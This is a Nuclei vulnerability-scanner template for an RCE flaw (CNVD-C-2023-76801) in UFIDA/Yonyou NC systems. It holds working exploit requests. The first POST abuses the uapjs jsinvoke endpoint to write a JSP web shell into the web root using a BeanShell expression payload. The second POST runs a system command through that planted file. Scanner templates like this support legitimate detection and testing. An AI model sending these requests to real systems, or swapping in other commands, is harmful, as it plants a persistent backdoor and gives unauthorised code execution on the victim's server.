id: CNVD-C-2023-76801

info:
  name: UFIDA NC uapjs - Remote Code Execution
  author: SleepingBag945,s4e-io
  severity: critical
  description: |
    There is an arbitrary method calling vulnerability in UFIDA NC and NCC systems. By exploiting the vulnerability through uapjs (jsinvoke), dangerous methods can be called to cause attacks.
  reference:
    - https://mp.weixin.qq.com/s/8ZRrmUCD2bfznd1MyDDU8A
  metadata:
    verified: true
    max-request: 2
    fofa-query: app="用友-NC-Cloud"
  tags: cnvd,cnvd2023,yonyou,rce,intrusive

variables:
  filename: "{{rand_base(12)}}"

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /uapjs/jsinvoke/?action=invoke HTTP/1.1
        Host: {{Hostname}}
        Content-type: application/x-www-form-urlencoded

        {"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["${param.getClass().forName(param.error).newInstance().eval(param.cmd)}","webapps/nc_web/{{filename}}.jsp"]}

    matchers:
      - type: dsl
        dsl:
          - "len(body)==0"
          - 'status_code == 200'
        internal: true

  - raw:
      - |
        POST /{{filename}}.jsp?error=bsh.Interpreter HTTP/1.1
        Host: {{Hostname}}
        Content-type: application/x-www-form-urlencoded

        cmd=org.apache.commons.io.IOUtils.toString(Runtime.getRuntime().exec("ipconfig").getInputStream())

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body,"Windows", "<?xml", "DNS")'
          - 'status_code == 200 || status_code == 404'
        condition: and
# digest: 4b0a00483046022100a21d5c0aac454d1aa4f09bd6520a56bf881345a46af665d127655c0ab64ca995022100c0fbae12eb60b515d23864acc0aa4db16861b280619da913b14c9f2aaaaaf161:922c64590222798bb761d5b6d8e72950